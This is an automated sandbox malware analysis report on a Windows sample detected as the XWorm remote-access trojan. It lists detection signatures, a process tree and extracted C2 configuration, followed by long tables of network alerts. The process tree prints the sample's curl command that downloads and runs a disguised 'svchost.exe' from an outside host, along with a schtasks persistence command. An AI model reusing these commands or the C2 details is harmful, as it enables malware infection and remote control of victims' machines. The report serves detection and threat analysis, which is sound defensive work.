Edit tour
Windows
Analysis Report
18sFhgSyVK.exe
Overview
General Information
Sample name: | 18sFhgSyVK.exerenamed because original name is a hash value |
Original sample name: | 22bbc82f84857c93f15ceb787da8ab57bd25aed0b32ef16124644231b1d142fc.exe |
Analysis ID: | 1561587 |
MD5: | 4e0d7812adef8e43e4eae77bf07dcc94 |
SHA1: | 2499fdf4c66070ec1b4d7c4e499f6dbc56565767 |
SHA256: | 22bbc82f84857c93f15ceb787da8ab57bd25aed0b32ef16124644231b1d142fc |
Tags: | exeuser-Chainskilabs |
Infos: | |
Detection
XWorm
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Stores files to the Windows start menu directory
Uses curl to download other files
Yara signature match
Classification
- System is w10x64
- 18sFhgSyVK.exe (PID: 6400 cmdline:
"C:\Users\ user\Deskt op\18sFhgS yVK.exe" MD5: 4E0D7812ADEF8E43E4EAE77BF07DCC94) - conhost.exe (PID: 2552 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 1768 cmdline:
C:\Windows \system32\ cmd.exe /c curl http s://r2.hyp ixel.cfd/s vchost.exe -o C:\Win dows\Start MenuExperi enceHost.e xe --silen t MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - curl.exe (PID: 7092 cmdline:
curl https ://r2.hypi xel.cfd/sv chost.exe -o C:\Wind ows\StartM enuExperie nceHost.ex e --silent MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - cmd.exe (PID: 6772 cmdline:
C:\Windows \system32\ cmd.exe /c color b MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 5936 cmdline:
C:\Windows \system32\ cmd.exe /c C:\Window s\StartMen uExperienc eHost.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - StartMenuExperienceHost.exe (PID: 1456 cmdline:
C:\Windows \StartMenu Experience Host.exe MD5: 9D9D23A73F3B3F53E8581D8BB31953C4) - schtasks.exe (PID: 2936 cmdline:
"C:\Window s\System32 \schtasks. exe" /crea te /f /RL HIGHEST /s c minute / mo 1 /tn " svchost" / tr "C:\Use rs\user~1\ AppData\Lo cal\Temp\s vchost.exe " MD5: 76CD6626DD8834BD4A42E6A565104DC2) - conhost.exe (PID: 5764 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- svchost.exe (PID: 6368 cmdline:
C:\Windows \System32\ svchost.ex e -k Netwo rkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 6756 cmdline:
C:\Windows \System32\ svchost.ex e -k Local SystemNetw orkRestric ted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 5772 cmdline:
C:\Windows \system32\ svchost.ex e -k Unist ackSvcGrou p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 5428 cmdline:
C:\Windows \System32\ svchost.ex e -k Local ServiceNet workRestri cted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - MpCmdRun.exe (PID: 7840 cmdline:
"C:\Progra m Files\Wi ndows Defe nder\mpcmd run.exe" - wdenable MD5: B3676839B2EE96983F9ED735CD044159) - conhost.exe (PID: 7848 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- svchost.exe (PID: 1496 cmdline:
C:\Windows \system32\ svchost.ex e -k Local Service -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 7208 cmdline:
C:\Users\u ser~1\AppD ata\Local\ Temp\svcho st.exe MD5: 9D9D23A73F3B3F53E8581D8BB31953C4)
- svchost.exe (PID: 7432 cmdline:
"C:\Users\ user~1\App Data\Local \Temp\svch ost.exe" MD5: 9D9D23A73F3B3F53E8581D8BB31953C4)
- svchost.exe (PID: 7588 cmdline:
"C:\Users\ user~1\App Data\Local \Temp\svch ost.exe" MD5: 9D9D23A73F3B3F53E8581D8BB31953C4)
- svchost.exe (PID: 7668 cmdline:
C:\Users\u ser~1\AppD ata\Local\ Temp\svcho st.exe MD5: 9D9D23A73F3B3F53E8581D8BB31953C4)
- svchost.exe (PID: 8136 cmdline:
C:\Users\u ser~1\AppD ata\Local\ Temp\svcho st.exe MD5: 9D9D23A73F3B3F53E8581D8BB31953C4)
- svchost.exe (PID: 2324 cmdline:
C:\Users\u ser~1\AppD ata\Local\ Temp\svcho st.exe MD5: 9D9D23A73F3B3F53E8581D8BB31953C4)
- svchost.exe (PID: 5860 cmdline:
C:\Users\u ser~1\AppD ata\Local\ Temp\svcho st.exe MD5: 9D9D23A73F3B3F53E8581D8BB31953C4)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
XWorm | Malware with wide range of capabilities ranging from RAT to ransomware. | No Attribution |
{"C2 url": ["127.0.0.1", "104.198.168.179"], "Port": 1337, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XWorm_1 | Yara detected XWorm | Joe Security | ||
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TelegramRecon | Yara detected Telegram Recon | Joe Security | ||
JoeSecurity_TelegramRecon | Yara detected Telegram Recon | Joe Security | ||
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
Click to see the 5 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | ||
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | ||
Click to see the 3 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | ||
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
|
System Summary |
---|
Source: | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: |
Source: | Author: David Burkett, @signalblur: |
Source: | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: frack113, Nasreddine Bencherchali: |
Source: | Author: vburov: |
Persistence and Installation Behavior |
---|
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-23T21:03:15.686107+0100 | 2853685 | 1 | A Network Trojan was detected | 192.168.2.7 | 49704 | 149.154.167.220 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-23T21:03:31.666395+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:03:35.005493+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:03:44.735562+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:03:57.811744+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:04:05.021284+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:04:10.892727+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:04:23.967438+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:04:31.734513+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:04:32.653666+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:04:35.036903+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:04:36.981287+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:04:48.781948+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:04:49.282930+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:04:52.904777+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:04:54.388194+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:04:54.589383+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:04:54.690403+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:04:54.801517+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:00.363403+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:00.564582+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:00.640704+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:00.760385+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:03.840384+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:05.053094+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:07.107572+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:07.308687+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:09.514457+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:12.481178+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:12.682711+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:12.939275+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:14.950023+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:26.887003+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:31.641024+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:35.069157+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:38.640134+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:38.949523+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:39.250891+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:39.497896+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:39.978714+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:44.551660+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:49.594079+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:50.497744+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:50.698991+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:51.591338+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:55.751418+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:06:00.701370+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:06:00.902763+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:06:01.878874+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:06:02.489633+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:06:05.390110+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:06:15.391981+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:06:16.150188+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:06:16.362651+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:06:16.550015+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:06:29.187457+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:06:34.374193+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:06:35.084989+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:06:42.797190+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:06:44.827208+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:06:46.503446+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:06:51.522127+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:06:52.270009+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:07:00.928713+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:07:02.376681+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:07:03.202099+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:07:05.084425+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:07:08.592033+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:07:11.747248+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-23T21:03:32.015251+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:03:44.739529+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:03:57.818615+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:03:58.126970+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:04:10.894733+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:04:23.980400+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:04:31.739407+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:04:32.655876+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:04:36.985967+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:04:48.784656+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:04:49.285345+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:04:52.906436+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:04:54.489032+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:04:54.608635+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:04:54.728415+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:04:54.848808+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:05:00.439092+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:05:00.566683+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:05:00.730220+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:05:00.849831+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:05:03.842107+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:05:07.111881+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:05:07.310411+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:05:09.516554+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:05:12.594933+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:05:12.720220+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:05:12.941567+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:05:14.951464+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:05:26.894889+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:05:31.653759+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:05:38.716530+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:05:39.017669+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:05:39.265257+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:05:39.502159+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:05:39.986161+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:05:44.555068+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:05:49.604419+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:05:50.499487+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:05:50.700760+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:05:51.593221+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:05:55.860453+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:06:00.704112+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:06:00.904480+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:06:01.903762+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:06:02.491826+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:06:15.396263+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:06:16.228275+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:06:16.457196+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:06:16.624665+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:06:29.190148+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:06:34.570564+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
